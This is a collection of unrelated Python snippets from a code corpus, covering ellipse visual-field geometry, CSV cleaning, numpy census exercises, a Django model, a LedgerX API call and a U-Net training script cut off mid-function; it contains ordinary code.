            # calculate tangent point from psi in local polar coordinates
            pt_subj_pol=_ellipse_point_from_parameter(r,theta,phi_m,p,w)
            z_pt_subj_pol=pt_subj_pol[0]+1j*pt_subj_pol[1]
            theta_tp=_cast_to_pm_pi(np.arctan2(pt_subj_pol[1],pt_subj_pol[0])-self.phi)
            r_tp=abs(z_pt_subj_pol)
            np.fill_diagonal(r_tp,0.0)
            tp_subj_pol.append(np.array([r_tp,theta_tp]))
            # transform tangent points to cartesian global coordinates
            pt_obj_cart=pt_subj_pol+np.array([np.array([self.pos[0],]*self.n),np.array([self.pos[1],]*self.n)])
            np.fill_diagonal(pt_obj_cart[0],0.0)
            np.fill_diagonal(pt_obj_cart[1],0.0)
            tp_obj_cart.append(pt_obj_cart)
        self.tangent_pt_subj_pol=np.array(tp_subj_pol)
        self.tangent_pt_obj_cart=np.array(tp_obj_cart)
    def _calc_vis_field_and_ang_area(self):
        '''1. Calculates the visual field for each ellipse and saves it to
        self.visual_field, an nxnx2(n-1) array, indices ijk as follows:
            i: 0:id of ellipse visible, 1:lower angular boundary of visible
               section, 2:upper angular boundary of visible section
            j: viewer id
            k: which section of visual field
        (a np.nan entry means no occlusion of visual field in this area)
        2. then calculates the angular area of each ellipse in the visual
        field of all other ellipses and saves it to self.angular_area, a
        numpy nxn array, indices ij:
            i: seen individual (the one who is seen by individual j)
            j: focal individual (the one whose visual field is given)'''
        # get ray angles for each ellipse (tangent point directions)
        angles=self.tangent_pt_subj_pol[:,1].flatten(order='f')
        angles=np.sort(angles[~np.isnan(angles)].reshape(2*(self.n-1),self.n,order='f').T)
        assert np.logical_and(angles.all()<=np.pi, angles.all()>=-np.pi), 'angles are not in pm pi interval'
        # bisectors between consecutive tangent angles: one probe ray per
        # visual-field section
        between_angles=_cast_to_pm_pi(np.diff(angles,append=(2.*np.pi+angles[:,0]).reshape(self.n,1),axis=1)/2.+angles)
        #++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
        # transformation of angles for the calculation of intersection points
        #++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
        # transform the local angles into points in global cartesian coordinates
        phi=self.phi
        phi_hlp=np.repeat(phi.reshape(self.n,1),2*(self.n-1),axis=1)
        transf_betw_ang=between_angles+phi_hlp
        raypoints=np.array([np.cos(transf_betw_ang),np.sin(transf_betw_ang)])+np.tile(self.pos,((self.n-1)*2,1,1)).transpose(1,2,0)
        # here we need to transform the raypoints from global coordinates to
        # local ones of the ellipse that we want to check for intersections
        # (in a manner that will set up a nested for loop)
        raypoints=np.tile(raypoints,(self.n,1,1,1)).transpose(1,0,2,3)
        #indices: x/y, N repetitions (in which coordinate system), focal id (seen from which eye), raypoints (which tangent point)
        pos_hlp=np.tile(self.pos_center,(2*(self.n-1),1,1)).transpose(1,2,0)
        pos_hlp=np.tile(pos_hlp,(self.n,1,1,1)).transpose(1,2,0,3)
        #indices ijkl: x/y, id (coordinate syst. = the individual that intersections will be found for), repetition (which eye), repetitions (which tangent point)
        # shifting the raypoints to a coordinate system with origin in the center of the ellipse j (the one that intersections will be found for)
        raypoints-=pos_hlp
        # now go to polar coordinates and rotate the points by -phi,
        # to orient the ellipse j along positive x-axis in the respective
        # coordinate system (this is needed because the function calculating
        # intersections assumes an ellipse at the center with this orientation)
        r=np.sqrt(raypoints[0]**2+raypoints[1]**2)
        theta=np.arctan2(raypoints[1],raypoints[0])
        phi_hlp=np.tile(phi,(self.n,(self.n-1)*2,1)).transpose(2,0,1)
        theta-=phi_hlp
        # now the transformation is over
        raypoints=np.array([r*np.cos(theta),r*np.sin(theta)])
        # Now we need to similarly transform the eye positions from
        # global to local (in a manner that will set up a nested for loop)
        # (the id of the viewer ellipse is the second last index, thus
        # the array needs to have repetitions for all other axes)
        eyes=np.tile(self.pos,(2*(self.n-1),1,1)).transpose(1,2,0)
        eyes=np.tile(eyes,(self.n,1,1,1)).transpose(1,0,2,3)
        #shift coordinate system origins
        eyes-=pos_hlp
        #rotate coordinate systems
        r=np.sqrt(eyes[0]**2+eyes[1]**2)
        theta=np.arctan2(eyes[1],eyes[0])
        theta-=phi_hlp
        eyes=np.array([r*np.cos(theta),r*np.sin(theta)])
        #transformation done
        #+++++++++++++++++++++++++++++++++++++++++++++++++++++++
        # Calculation of intersection points
        #+++++++++++++++++++++++++++++++++++++++++++++++++++++++
        inters=_get_ellipse_line_intersection_points(eyes,raypoints,self.w)
        inters=_remove_self_intersections(inters,self.n)
        # indices: [x/y, which intersection, on which ellipse,
        #           for which viewer, for which ray]
        #+++++++++++++++++++++++++++++++++++++++++++++++++++++++
        # all intersection points are still in coordinates of
        # the 'on which ellipse' ellipse, transform to global coordinates next:
        #1. rotate by +phi
        theta=np.arctan2(inters[1],inters[0])+phi_hlp
        r=np.sqrt(inters[0]**2+inters[1]**2)
        inters=np.array([r*np.cos(theta),r*np.sin(theta)])
        # 2. and shift position of origin
        pos_hlp=np.tile(pos_hlp,(2,1,1,1,1)).transpose(1,0,2,3,4)
        inters=inters+pos_hlp
        # in order to decide which intersection point is closest to an
        # ellipse we need to move to the coordinate system of the ellipse
        # which is emitting the rays from its eye (second last index)
        # (we skip the rotation because we are only interested in the
        # distances r anyways)
        pos_hlp=np.tile(self.pos,(2*(self.n-1),1,1)).transpose(1,2,0)
        pos_hlp=np.tile(pos_hlp,(self.n,1,1,1)).transpose(1,2,0,3)
        pos_hlp=np.tile(pos_hlp,(2,1,1,1,1)).transpose(1,0,3,2,4)
        #shift to the local coordinates
        inters-=pos_hlp
        #calculate the distances:
        r=np.sqrt(inters[0]**2+inters[1]**2)
        # For each ray emitted from the eye of a viewer ellipse, find
        # the id of the closest ellipse it intersects with
        out=np.empty([self.n,(self.n-1)*2],dtype=float)
        closest_id=_get_closest_id(r,out,self.n)
        self.visual_field=np.stack([closest_id,angles,np.roll(angles,-1,axis=-1)])
        # 1st index: id of ellipse visible/lower boundary/upper boundary
        # 2nd index: viewer id
        # 3rd index: which section of visual field
        area=np.stack([closest_id,(np.diff(self.visual_field[1::,:,:],axis=0)%np.pi)[0]])
        # id and angular width for each section of the visual field of each
        # ellipse; indices ijk:
        #   i: id/angle
        #   j: viewer id
        #   k: section id
        # calculate angular area: sum the widths of all sections in which
        # individual i is the closest (visible) one
        angular_area=np.zeros([self.n,self.n],dtype=float)
        for i in range(self.n):
            mask=area[0]==i
            angular_area[i,:]=np.sum(mask*area[1],axis=-1)
        self.angular_area=angular_area
    def plot_ellipses(self,fig=None,ax=None,color='w',zorder=100,alpha=0.7,show_index=False,edgecolor='0.4', cmap=cm.Greys,show_eyes=True, eyecolor='k',eyesize=5,edgewidth=1,z_label='',norm_z=False,show_colorbar=True):
        """Draw all ellipses (and optionally their eyes) on a matplotlib
        axes.

        `color` may be a single color or a per-individual scalar array,
        in which case it is mapped through `cmap` (normalized either to
        the data range or to the provided `norm_z`), with an optional
        horizontal colorbar labelled `z_label`.
        """
        ellipses=[]
        if fig is None:
            fig=plt.gcf()
        if ax is None:
            ax=plt.gca()
        if type(color)==str or np.shape(color)==(4,) or np.shape(color)==(3,):
            # one fixed color for everybody
            color=[color for i in range(self.n)]
        else:
            # scalar per individual: map through the colormap
            cmax=np.amax(color)
            cmin=np.amin(color)
            cmap_z=cmap
            if not norm_z:
                color=cmap((color-cmin)/(cmax-cmin))
                norm_z=cm.colors.Normalize(vmin=cmin,vmax=cmax)
            else:
                color=cmap(norm_z(color))
            if show_colorbar:
                ax1 = fig.add_axes([0.2, 0.2, 0.6, 0.03])
                cb_z =colorbar.ColorbarBase(ax1, cmap=cmap_z,norm=norm_z, orientation='horizontal',label=z_label)
        for i in range(self.n):
            # Ellipse takes the angle in degrees, measured for the minor axis
            ellipses.append(Ellipse(self.pos_center[:,i],self.w,1.0,_cast_to_pm_pi(self.phi[i])*180.0/np.pi-90.0))
        for i in range(self.n):
            ax.add_artist(ellipses[i])
            ellipses[i].set_clip_box(ax.bbox)
            ellipses[i].set_facecolor(color[i])
            ellipses[i].set_alpha(alpha)
            ellipses[i].set_edgecolor(edgecolor)
            ellipses[i].set_linewidth(edgewidth)
            ellipses[i].set_zorder(zorder)
            if show_index:
                ax.text(self.pos_center[0,i],self.pos_center[1,i],str(i))
        if show_eyes:
            if eyecolor=='map':
                self.draw_eyes(ax,color=color,size=eyesize)
            else:
                self.draw_eyes(ax,color=eyecolor,size=eyesize)
        ax.set_xlim(np.amin(self.pos_center[0])-1,np.amax(self.pos_center[0])+1)
        ax.set_ylim(np.amin(self.pos_center[1])-1,np.amax(self.pos_center[1])+1)
        ax.set_aspect('equal')
        ax.spines['top'].set_visible(False)
        ax.spines['right'].set_visible(False)
        ax.tick_params(axis='both', colors='0.5')
        ax.spines['bottom'].set_color('0.5')
        ax.spines['left'].set_color('0.5')
def draw_eyes(self,ax,color='k',size=20):
ax.scatter(self.pos[0,:],self.pos[1,:],color=color,s=size,zorder=10000)
    def plot_visual_field(self,ax=None,viewer_id=1,color='darkseagreen',edgewidth=1,alpha=0.4,edgecolor='none',recolor_vis_individuals=False,vis_thresh=0.,dist_thresh=np.inf):
        """Visualize the visual field of one individual.

        For every visual-field section of `viewer_id` whose visible
        individual exceeds `vis_thresh` angular area and lies closer than
        `dist_thresh`, draws a shaded triangle from the viewer's eye to
        the occluding tangent line; optionally recolors each visible
        individual once.

        Requires self.visual_field / self.tangent_pt_obj_cart /
        self.metric_distance_center to be computed already.
        """
        pos_center=self.pos_center
        pos=self.pos
        phi=self.phi
        segments=self.visual_field
        tps=self.tangent_pt_obj_cart
        md=self.metric_distance_center
        colored=[]
        if ax is None:
            ax=plt.gca()
        for k in range(2*(self.n-1)):
            if not np.isnan(segments[0,viewer_id,k]):
                i=int(segments[0,viewer_id,k])
                if self.angular_area[i,viewer_id]>vis_thresh and md[i,viewer_id]<dist_thresh:
                    if recolor_vis_individuals and i not in colored:
                        # draw each visible individual only once
                        colored.append(i)
                        ellipse=Ellipse(pos_center[:,i],self.w,1.0,phi[i]*180.0/np.pi-90.0)
                        ax.add_artist(ellipse)
                        ellipse.set_clip_box(ax.bbox)
                        ellipse.set_facecolor(color)
                        ellipse.set_alpha(1)
                        ellipse.set_linewidth(edgewidth),
                        ellipse.set_edgecolor(edgecolor)
                    # intersect the section boundary rays with the tangent
                    # line of ellipse i to bound the shaded area
                    hlp_low=_subjpol_to_objcart(md[i,viewer_id],segments[1,viewer_id,k],pos[:,viewer_id],phi[viewer_id])
                    hlp_high=_subjpol_to_objcart(md[i,viewer_id],segments[2,viewer_id,k],pos[:,viewer_id],phi[viewer_id])
                    p1=_line_intersect(hlp_low[0],hlp_low[1],pos[0,viewer_id],pos[1,viewer_id],tps[0,0,i,viewer_id],tps[0,1,i,viewer_id],tps[1,0,i,viewer_id],tps[1,1,i,viewer_id])
                    p2=_line_intersect(hlp_high[0],hlp_high[1],pos[0,viewer_id],pos[1,viewer_id],tps[0,0,i,viewer_id],tps[0,1,i,viewer_id],tps[1,0,i,viewer_id],tps[1,1,i,viewer_id])
                    visual_area=Polygon([p1,p2,pos[:,viewer_id]])
                    ax.add_artist(visual_area)
                    visual_area.set_facecolor(color)
                    visual_area.set_alpha(alpha)
        ax.spines['top'].set_visible(False)
        ax.spines['right'].set_visible(False)
        ax.tick_params(axis='both', colors='0.5')
        ax.spines['bottom'].set_color('0.5')
        ax.spines['left'].set_color('0.5')
def _create_network_graph(self,adjacency_matrix,allinfo=True,plotting_threshold=0.):
network=nx.DiGraph(adjacency_matrix)
if allinfo:
for i in range(len(adjacency_matrix[0])):
network.nodes()[i]['pos']=self.pos[:,i]
network.nodes()[i]['phi']=self.phi[i]
return network
    def draw_binary_network(self,network,fig=None,ax=None,rad=0.0,draw_ellipses=True,ellipse_edgecolor='k',ellipse_facecolor='none',link_zorder=10,show_index=False,scale_arrow=10,linkalpha=0.5,lw=0.8,arrowstyle='-|>',linkcolor='0.4'):
        '''
        Draw a directed interaction network on top of the ellipse
        configuration: one patch per node (ellipse) and one curved arrow
        per directed edge.

        INPUT:
        network: nx.DiGraph whose nodes carry 'pos' and 'phi' attributes
                 (as produced by _create_network_graph)
        '''
        if fig is None:
            fig=plt.gcf()
        if ax is None:
            ax=plt.gca()
        l=self.l
        w=self.w
        for n in network:
            if show_index:
                ax.text(network.nodes[n]['pos'][0],network.nodes[n]['pos'][1],str(int(n)))
            # shift from eye position back to the geometric center
            c=Ellipse(network.nodes[n]['pos']+np.array([-l/2.0*np.cos(network.nodes[n]['phi']),-l/2.0*np.sin(network.nodes[n]['phi'])]),w,1.0,network.nodes[n]['phi']*180.0/np.pi-90.0)
            ax.add_patch(c)
            c.set_facecolor(ellipse_facecolor)
            if draw_ellipses:
                c.set_edgecolor(ellipse_edgecolor)
            else:
                c.set_edgecolor('none')
            network.nodes[n]['patch']=c
        seen={}
        for (u,v,d) in network.edges(data=True):
            #if d['weight']>=threshold:
            n1=network.nodes[u]['patch']
            n2=network.nodes[v]['patch']
            if (u,v) in seen:
                # bend repeated edges a little more and flip the side
                rad=seen.get((u,v))
                rad=(rad+np.sign(rad)*0.1)*-1
            e = FancyArrowPatch(n1.center,n2.center,patchA=n1,patchB=n2,
                                arrowstyle=arrowstyle,
                                mutation_scale=scale_arrow,
                                connectionstyle='arc3,rad=%s'%rad,
                                lw=lw,
                                alpha=linkalpha,
                                color=linkcolor,zorder=link_zorder)
            seen[(u,v)]=rad
            ax.add_patch(e)
        ax.set_xlim(np.amin(self.pos_center[0])-1,np.amax(self.pos_center[0])+1)
        ax.set_ylim(np.amin(self.pos_center[1])-1,np.amax(self.pos_center[1])+1)
        ax.set_aspect('equal')
        ax.spines['top'].set_visible(False)
        ax.spines['right'].set_visible(False)
        ax.tick_params(axis='both', colors='0.5')
        ax.spines['bottom'].set_color('0.5')
        ax.spines['left'].set_color('0.5')
def _get_ellipse_line_intersection_points(eyes,tps,w):
''' given two points of the line (eyes and tp) calculates
the points at which this line intersects with an ellipse
of length 1 and width w with center at the origin and
orientation along the positive x-axis,
returns points as 2x2 array,
index1: x/y,
index2: which intersection point,
if only 1 intersections found both entries are equal,
if no intersections are found, entries are np.nan'''
x1=eyes[0]
y1=eyes[1]
x2=tps[0]
y2=tps[1]
a=0.5
b=w/2.
dd=((x2-x1)**2/(a**2)+(y2-y1)**2/(b**2))
ee=(2.*x1*(x2-x1)/(a**2)+2.*y1*(y2-y1)/(b**2))
ff=(x1**2/(a**2)+y1**2/(b**2)-1.)
determinant=ee**2-4.*dd*ff
float_epsilon=0.00001
zeromask=abs(determinant)>=1000.*float_epsilon
determinant*=zeromask
t=(np.array([(-ee-np.sqrt(determinant))/(2.*dd),
(-ee+np.sqrt(determinant))/(2.*dd)]))
mask=np.array(t>0.,dtype=float)
mask[mask==0.]=np.nan
x=mask*(x1+(x2-x1)*t)
y=mask*(y1+(y2-y1)*t)
return np.array([x,y])
def _remove_self_intersections(inters,n):
''' used to remove intersections of ray emitted from ellipse i's eye and intersecting with
ellipse i's boundary when detecting all intersections of those rays with all other ellipses,
inters is array of interception points with indices ijklm
i: x/y [2],
j: which intersection [2],
k: on which ellipse [n],
l: for which viewer [n],
m: for which ray [2(n-1)]'''
for i in range(n):
inters[:,:,i,i,:]=np.nan
return inters
def _get_closest_id(r,out,n):
''' used to find the closest intersection point on a ray emitted from and ellipses eye,
r is numpy array with indices jklm as follows:
j: which intersection [2],
k: on which ellipse [n],
l: for which viewer [n],
m: for which ray [2(n-1)]'''
for j,k in it.product(range(n),range((n-1)*2)):
if np.isnan(r[:,:,j,k]).all():
out[j,k]=np.nan
else:
out[j,k]=np.nanargmin(r[:,:,j,k],axis=1)[1]
return out
def _get_tangent_point_parameter(w,r,theta,phi,main_axis=0.5):
    '''calculates where the tangent points lie on the ellipse, return the corresponding angles,
    these can be translated in to coordinates via using the function
    ellipse_point_from_parameter()
    '''
    # Convert full width to the semi-minor axis.
    w=w/2.0
    # Closed-form expression for the two ellipse parameters psi whose tangent
    # lines pass through the external point at polar (r, theta), for an
    # ellipse with semi-major `main_axis` oriented along phi.
    # NOTE(review): presumably derived symbolically (e.g. with a CAS); the
    # derivation is not reproduced here -- verify against the original source.
    aa=np.sqrt(-2.0*main_axis*main_axis*w*w + (main_axis*main_axis + w*w)*r*r +
               (w*w - main_axis*main_axis)*r*r*np.cos(2.0*(theta - phi)))/np.sqrt(2.0)
    bb= w*r*np.cos(theta - phi) - main_axis*w
    psi1=2.0*np.arctan2(aa-main_axis*r*np.sin(theta - phi),bb)
    psi2= -2.0*np.arctan2(aa+main_axis*r*np.sin(theta - phi),bb)
    return [psi1,psi2]
def _numberofrings(nn):
lower_estimate=nn/np.pi
upper_estimate=(np.sqrt(4.*np.pi*nn+1)+1)/2.*np.pi
return int(np.floor(lower_estimate)), int(np.floor(upper_estimate))
def _cast_to_pm_pi(a):
'''Casts any (radian) angle to the
equivalent in the interval (-pi, pi)'''
b = (a+np.pi)%(2.*np.pi)
b -= np.pi
return b
def _ellipse_polyline(ellipses, n=100):
'''returns a polygon approximation of an ellipse with n points'''
t = np.linspace(0, 2*np.pi, n, endpoint=False)
st = np.sin(t)
ct = np.cos(t)
result = []
for x0, y0, a, b, angle in ellipses:
sa = np.sin(angle)
ca = np.cos(angle)
p = np.empty((n, 2))
p[:, 0] = x0 + a/2.0 * ca * ct - b * sa * st
p[:, 1] = y0 + a/2.0 * sa * ct + b * ca * st
result.append(p)
return result
def _intersections(a, b):
    '''Return True when the closed rings through point lists a and b intersect.'''
    return LinearRing(a).intersects(LinearRing(b))
def _line_intersect(x1a,y1a,x1b,y1b,x2a,y2a,x2b,y2b):
# finds the point where two lines intersect.
# lines are given by two points each:
# line 1 goes through (x1a,y1a) and (x1b, y1b)
# the same goes for line2
point=None
if (x1b-x1a)!=0:
if (x2b-x2a)!=0:
m1=(y1b-y1a)/(x1b-x1a)
m2=(y2b-y2a)/(x2b-x2a)
if m1!=m2:
b1=y1a-m1*x1a
b2=y2a-m2*x2a
x=(b2-b1)/(m1-m2)
y=m1*x+b1
point=[x,y]
else:
print('lines are parallel')
else:
x=x2b
m1=(y1b-y1a)/(x1b-x1a)
b1=y1a-m1*x1a
y=m1*x+b1
point=[x,y]
else:
if (x2b-x2a)!=0:
x=x1b
m2=(y2b-y2a)/(x2b-x2a)
b2=y2a-m2*x2a
y=m2*x+b2
point=[x,y]
else:
print('lines are parallel')
if point!=None:
point=np.array(point)
return point
def _smallestSignedAngleBetween(x,y):
#returns smallest of the two angles from x to y
tau=2*np.pi
a = (x - y) % tau
b = (y - x) % tau
return -a if a < b else b
def _ellipse_point_from_parameter(r,theta,phi,psi,w,l=0.5):
#calculates cartesian coordinates for a point on an ellipse
# with long axis 1, short axis w, ellipse center at r,theta
# that is given by the ellipse parameter psi
x=r*np.cos(theta) + l*np.cos(phi)*np.cos(psi) + w*l*np.sin(phi)*np.sin(psi)
y=r*np.sin(theta) + l*np.sin(phi)*np.cos(psi) - w*l*np.cos(phi)*np.sin(psi)
return [x,y]
def _subjpol_to_objcart(r,theta,pos,phi):
# takes in a point, r, theta from the polar coordinates
# with center at pos and orientation phi
# returns a point in cartesian coordinates (same
# coordinate system that pos is given in)
rot_mat_back=np.array([[np.cos(-phi),np.sin(-phi)],[-np.sin(-phi),np.cos(-phi)]])
pt_subj=[r*np.cos(theta),r*np.sin(theta)]
pt_obj=np.dot(rot_mat_back,pt_subj)+pos
return pt_obj
| StarcoderdataPython |
256356 | <reponame>mtanner161/kingops
## File to clean the Operating Statement exported via Wolfpak.
## Reads the raw CSV, pulls the date row, and writes one
## (Date, Description, Value) record per cell to a tidy CSV.
import os
import pandas as pd
import numpy as np
import requests

osRaw = pd.read_csv(
    r"C:\Users\MichaelTanner\Documents\code_doc\king\combocurve\ComboCurve\operatingstatementOctober.csv"
)

# Dates live in the first data row, one per value column (columns 3..end).
# Fix: the original collected them into np.zeros(dtype=str), which silently
# truncates every assignment to a single character; a plain list is correct.
dates = [str(osRaw.iat[0, j]) for j in range(3, len(osRaw.columns))]

# Fix: use a context manager so the file is flushed/closed, index cells with
# DataFrame.iat (the original's osRaw[i][j] indexes by column label, not row),
# and write a single formatted string (file.write takes one argument).
with open("./king/combocurve/ComboCurve/cleanOperatingStatment.csv", "w") as fp:
    fp.write("Date, Description, Value\n")
    for i in range(1, len(osRaw)):
        # Skip rows without a value in the first data column.
        if pd.isna(osRaw.iat[i, 4]):
            continue
        description = osRaw.iat[i, 3]
        for j in range(3, len(osRaw.columns)):
            fp.write("{}, {}, {}\n".format(dates[j - 3], description, osRaw.iat[i, j]))

print("Hello World")
| StarcoderdataPython |
6617043 | """Current version of package cdesf2"""
__version__ = "1.0.0" | StarcoderdataPython |
11245716 | import ledgerx
from examples.example_util import get_env_api_key
# Authenticate the client library with the API key from the environment.
ledgerx.api_key = get_env_api_key()
# id=22202077 -> BTC Mini 2021-12-31 Call $25,000
contract_id = 22202077
# Fetch the contract's details from the LedgerX REST API and display them.
contract = ledgerx.Contracts.retrieve(contract_id)
print(contract)
| StarcoderdataPython |
5010668 | <reponame>sharduldk14/greyatom-python-for-data-science<filename>Numpy-Census-Project/code.py
# --------------
# Importing header files
import numpy as np
# Path of the file has been stored in variable called 'path'
# NOTE(review): `path` is injected by the grading environment, not defined here.
#New record
new_record=[[50, 9, 4, 1, 0, 0, 40, 0]]
#Code starts here
# Load the census data (skipping the header) and append the new record.
data=np.genfromtxt(path,delimiter=",",skip_header=1)
census=np.concatenate([data,new_record])
# --------------
#Code starts here
# Column 0 presumably holds age -- compute its basic statistics.
age=census[:,0]
max_age=age.max()
print(max_age)
min_age=age.min()
age_mean=np.mean(age)
age_std=np.std(age)
# --------------
#Code starts here
# Split by race code (column 2) and find the least-represented race.
race_0=census[census[:,2]==0]
race_1=census[census[:,2]==1]
race_2=census[census[:,2]==2]
race_3=census[census[:,2]==3]
race_4=census[census[:,2]==4]
len_0=len(race_0)
len_1=len(race_1)
len_2=len(race_2)
len_3=len(race_3)
len_4=len(race_4)
len_=[len_0,len_1,len_2,len_3,len_4]
minority_race=len_.index(min(len_))
print(minority_race)
# --------------
#Code starts here
# Senior citizens: age over 60; column 6 presumably holds hours-per-week.
senior_citizens=census[census[:,0]>60]
print(senior_citizens)
working_hours_sum=senior_citizens.sum(axis=0)[6]
#Finding the length of the array
senior_citizens_len=len(senior_citizens)
#Finding the average working hours
avg_working_hours=working_hours_sum/senior_citizens_len
#Printing the average working hours
print((avg_working_hours))
# --------------
#Code starts here
# Compare average pay (column 7) by education level (column 1).
import numpy as np
high=census[census[:,1]>10]
low=census[census[:,1]<=10]
avg_pay_high=high[:,7].mean()
print(avg_pay_high)
avg_pay_low=low[:,7].mean()
print(avg_pay_low)
17090 | <reponame>rithvikp1998/ctci
'''
If the child is currently on the nth step,
then there are three possibilites as to how
it reached there:
1. Reached (n-3)th step and hopped 3 steps in one time
2. Reached (n-2)th step and hopped 2 steps in one time
3. Reached (n-1)th step and hopped 2 steps in one time
The total number of possibilities is the sum of these 3
'''
def count_possibilities(n, store):
    """Fill store[i], for every unseeded i <= n, with the number of ways to
    climb i steps taking hops of 1, 2 or 3 at a time.

    `store` must be pre-seeded with the base cases (store[1..3]); entries
    equal to 0 are treated as "not yet computed" and are filled bottom-up.

    Fix: the original recursed once per remaining step, so large n hit
    Python's recursion limit (RecursionError); this iterative bottom-up
    fill computes the same tribonacci-style recurrence without recursion.
    """
    for step in range(4, n + 1):
        if store[step] == 0:
            store[step] = store[step - 1] + store[step - 2] + store[step - 3]
n=int(input())
store=[0 for i in range(n+1)] # Stores the number of possibilites for every i<n
# Seed the base cases: 1, 2 and 4 ways for 1, 2 and 3 steps respectively.
# NOTE(review): this seeding assumes n >= 3; smaller inputs raise IndexError.
store[0]=0
store[1]=1
store[2]=2
store[3]=4
count_possibilities(n, store)
print(store[n])
| StarcoderdataPython |
4879154 | from django.db import models
class SubscribeModel(models.Model):
    """Newsletter subscription record."""
    # Subscriber's e-mail address (free text, may be left empty).
    email_id = models.CharField(max_length=255, blank=True)
    # Registration timestamp, stored as a plain string rather than a DateTimeField.
    regist_date = models.CharField(max_length=255, blank=True)
| StarcoderdataPython |
5074353 | """
See problem as defined in "Boosting systematic search by weighting constraints" by Boussemart, Hemery, Lecoutre and Sais, ECAI 2004
Examples of Execution:
python3 QueensKnights.py
python3 QueensKnights.py -data=[15,5]
"""
from pycsp3 import *
# NOTE: `data` is injected by the pycsp3 runner (-data=[...]); defaults to (8, 5).
n, nKnights = data or (8, 5)  # n is the order(board width), and so the number of queens
# q[i] is the column number of the board where is put the ith queen (in the ith row)
q = VarArray(size=n, dom=range(n))
# k[i] is the cell number of the board where is put the ith knight
k = VarArray(size=nKnights, dom=range(n * n))
# Post all constraints of the model (queens non-attacking, knights forming a cycle).
satisfy(
    # all queens are put in different columns
    AllDifferent(q),
    # controlling no two queens on the same upward diagonal
    AllDifferent(q[i] + i for i in range(n)),
    # controlling no two queens on the same downward diagonal
    AllDifferent(q[i] - i for i in range(n)),
    # all knights are put in different cells
    AllDifferent(k),
    # all knights form a cycle (consecutive knights a chess-knight move apart)
    [(abs(k[i] // n - k[(i + 1) % nKnights] // n), abs(k[i] % n - k[(i + 1) % nKnights] % n)) in {(1, 2), (2, 1)} for i in range(nKnights)]
)
""" Comments
1) adding (q[i] != k[j] % n) | (i != k[j] // n) for i in range(n) for j in range(nKnights) does not seem to filter more values.
2) expressing a table constraint where the scope does not list simple variables entails automatically introducing auxiliary variables at compilation time
""" | StarcoderdataPython |
class SerializationException(Exception):
    """Raised when serializing data to `path` fails.

    Attributes:
        path: destination that could not be written.
        backup_path: optional fallback location, if one was attempted.
        result: partial result produced before the failure.
    """

    def __init__(self, error_message, path, result, backup_path=None):
        self.path = path
        self.backup_path = backup_path
        self.result = result
        # Python-3 style super() replaces the redundant two-argument form.
        super().__init__(error_message)
class DeserializationException(Exception):
    """Raised when deserializing data from `path` fails.

    Attributes:
        path: source that could not be read/parsed.
        backup_path: optional fallback location, if one was attempted.
    """

    def __init__(self, error_message, path, backup_path=None):
        self.path = path
        self.backup_path = backup_path
        # Python-3 style super() replaces the redundant two-argument form.
        super().__init__(error_message)
| StarcoderdataPython |
1826716 | <gh_stars>0
"""
Desarrolle un algoritmo, que dado como dato una temperatura en grados Fahrenheit, determine el deporte que es apropiado practicar a esa temperatura, teniendo en cuenta la siguiente tabla:
"""
T=float(input("Digite la temperatura: "))
if(T>85):
print("Deporte que es apropiado practicar a esa temperatura: Natación")
elif(T>=71 and T<=85):
print("Deporte que es apropiado practicar a esa temperatura: Tenis")
elif(T>=33 and T<=70):
print("Deporte que es apropiado practicar a esa temperatura: Golf")
elif(T>=11 and T<=32):
print("Deporte que es apropiado practicar a esa temperatura: Esquí")
elif(T<=10):
print("Deporte que es apropiado practicar a esa temperatura: Marcha")
else:
print("Deporte que es apropiado practicar a esa temperatura: No se identifico deporte") | StarcoderdataPython |
1986580 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# ˅
from structural_patterns.decorator.frame import Frame
# ˄
class SideFrame(Frame):
    # Decorator that draws `frame_char` on the left and right of the wrapped
    # Display (classic Decorator pattern, see the GoF "Decorator" example).
    # NOTE: the "˅"/"˄" comments are code-generator fences -- keep them intact.
    # ˅
    # ˄
    def __init__(self, display, frame_char):
        # Decoration character
        self.__frame_char = frame_char
        # ˅
        super().__init__(display)
        # ˄
    # Number of characters added left and right decoration characters
    def get_columns(self):
        # ˅
        # Wrapped width plus one decoration column on each side.
        return 1 + self.display.get_columns() + 1
        # ˄
    # Number of lines
    def get_rows(self):
        # ˅
        # Side frames add no extra rows.
        return self.display.get_rows()
        # ˄
    def get_line_text(self, row):
        # ˅
        # Surround the wrapped line with the decoration character.
        return self.__frame_char + self.display.get_line_text(row) + self.__frame_char
        # ˄
    # ˅
    # ˄
    # ˅
    # ˄
| StarcoderdataPython |
5131494 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
from PyQt5.QtWidgets import (QApplication, QWidget)
class MainWidget(QWidget):
def __init__(self):
QWidget.__init__(parent=None, flags=0)
app = QApplication(sys.argv)
w = MainWidget()
# NOTE(review): the widget is created but never shown (no w.show()), so
# app.exec() runs an event loop with no visible window -- confirm intent.
app.exec()
| StarcoderdataPython |
4830080 | '''
practice qusestion from chapter 1 Module 5 of IBM Digital Nation Courses
by <NAME>/<NAME>
'''
# Testing variables: a name can be rebound to a new value at any time.
x = 25
print (x)
# Rebind x and print again to show the updated value.
x = 30
print (x)
#end of the Program
356222 | <filename>UNetRestoration/train.py
"""
Main training file
The goal is to correct the colors in underwater images.
The image pair contains color-distort image (which can be generate by CycleGan),and ground-truth image
Then, we use the u-net, which will attempt to correct the colors
"""
import tensorflow as tf
from scipy import misc
import math
import glob
import numpy as np
import os
import time
os.environ['CUDA_VISIBLE_DEVICES'] = '0'
# my imports
from unet_model import UNet
from utils import BatchRename, ImageProcess
# Training hyper-parameters.
init_learning_rate = 1e-4
# Momentum Optimizer
nesterov_momentum = 0.9
# l2 regularizer
weight_decay = 1e-4
batch_size = 32
total_epochs = 10
# trainA: color-distorted (underwater) images; trainB: ground-truth (air) images.
trainA_path = '/home/frost/image_enhance/UIE/UWGAN_Results/Water_near_1/results_1/water/'
trainB_path = '/home/frost/image_enhance/UIE/UWGAN_Results/Water_near_1/results_1/air/'
# Output locations for TensorBoard logs and model checkpoints.
log_path = './Far2/logs_l1/'
ckpt_path = './Far2/checkpoints_l1/'
def cosine_learning_rate(learn_rate, n_epochs, cur_epoch):
    """
    Cosine-annealed learning rate, decaying smoothly from `learn_rate`
    (at epoch 0) to 0 (at epoch n_epochs).
    :param learn_rate: initial learning rate (e.g. 0.1)
    :param n_epochs: total number of training epochs
    :param cur_epoch: current epoch index
    :return: annealed learning rate for this epoch
    """
